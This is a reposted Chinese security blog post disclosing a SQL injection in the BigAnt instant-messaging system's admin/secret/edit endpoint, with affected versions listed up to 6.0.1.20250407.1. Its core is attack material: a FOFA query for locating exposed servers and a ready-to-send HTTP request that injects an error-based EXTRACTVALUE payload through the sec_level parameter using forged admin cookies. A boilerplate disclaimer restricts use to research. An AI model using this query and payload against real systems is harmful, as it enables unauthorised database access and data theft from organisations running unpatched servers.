文章总结： 大蚂蚁即时通讯系统admin/secret/edit接口存在SQL注入漏洞，攻击者可通过updateloginname参数注入恶意SQL语句，导致敏感信息泄露、数据篡改或系统控制权限获取，影响5.5.x及以上版本包括6.0.1.20250407.1。 综合评分： 78 文章分类： 漏洞分析,Web安全,应用安全,应急响应,安全开发

大蚂蚁 (BigAnt) 即时通讯系统 admin/secret/edit SQL注入漏洞

0day收割机

2026年6月17日 20:33 山东

在小说阅读器读本章

去阅读

漏洞简介

大蚂蚁 (BigAnt) 即时通讯系统是一款企业级IM通信管理系统，提供多种功能支持。该系统的 \Admin\Controller\SecretController::edit 接口存在SQL注入漏洞，攻击者可通过在 updateLoginName 功能的相关参数中插入恶意构造的 SQL 查询语句，实现对后端数据库的非法操作，可能导致敏感信息泄露、数据篡改、绕过身份验证，甚至在特定配置下实现任意命令执行或获取系统控制权限。

影响版本

BigAnt 5.5.x 及以上版本用户

经过测试，最新版本 6.0.1.20250407.1 也受影响

fofa语法

(body=”/Public/static/admin/admin_common.js” && body=”/Public/lang/zh-cn.js.js”) || title=”即时通讯 系统登录” && body=”/Public/static/ukey/Syunew3.js”

漏洞复现

GET /admin/secret/edit?app_id=pc_client&sec_level={{url(1' AND EXTRACTVALUE(1, CONCAT(0x7e, user(), 0x7e)) and '1'='1)}} HTTP/1.1
Host:
Cookie: userId=admin;saasId=bigant
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

因为系统配置原因，不存在antdbms.hs_secret表，但是漏洞是真实存在的。

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机 《大蚂蚁 (BigAnt) 即时通讯系统 admin/secret/edit SQL注入漏洞》